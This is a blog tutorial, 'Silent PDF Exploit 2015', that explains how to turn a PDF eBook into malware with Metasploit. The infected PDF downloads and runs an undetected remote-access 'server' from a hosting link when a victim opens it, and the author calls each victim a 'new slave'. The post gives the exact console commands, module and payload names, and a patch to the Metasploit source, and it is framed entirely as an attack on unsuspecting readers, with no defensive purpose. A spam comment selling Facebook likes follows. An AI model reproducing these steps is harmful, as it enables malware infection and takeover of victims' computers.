WHAT'S NEW?
Loading...

Silent PDF Exploit 2015

This guide will tell you how to backdoor a PDF. What this basically does is that it will download your server when someone opens your PDF file



TUT:
Requirements:
Metasploit, a PDF eBook and a FUD server.Metasploit can be downloaded Here
Search the web for free eBooks
Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropbox or DirectXEX
And make sure that you have installed Metasploit correctly!

FIXED - Incompatible PDF Structure / Sorry I'm picky error fixed:
1. Open up your Metasploit directory folder and go here:"C:\metasploit\apps\pro\msf3\lib\msf\core\exploit\pdf_parse.rb" - Open this file with EmEditor / Notepad.2. Change the "read_pdf()" function to:

PHP Code:
def read_pdf()       #stream = IO.read("#{datastore['INFILENAME']}")       stream = open("#{datastore['INFILENAME']}", "rb") {|io| io.read }       return stream     end

3. Reboot your computer!
4. When doing this exploit, find an old PDF file like this one in your directory:
"C:/metasploit/apps/pro/ui/public/docs/Phishing_QuickStartGuide.pdf"


PROOF:
PUWxxDN.png

Now we will infect the PDF file

1. Open up Metasploit console

2. Type this in the console:
use exploit/windows/fileformat/adobe_pdf_embedded_exe

3. Type this in the console:
set payload windows/download_exec

4. Type this in console:
set INFILENAME

EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf

5. Type this in console:
set url EXAMPLE: set url http://download.com/server.exe

6. Type this in console:
Exploit
Now you have infected your PDF file and you will be ready to send it out.
When people open the infected PDF file then it will download your server and *BAM* new slave.(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)


Good Bye

2 comments: Leave Your Comments

  1. You may additionally need these UNITED STATE Facebook Likes for winning competitions that are held online. buy us facebook likes

    ReplyDelete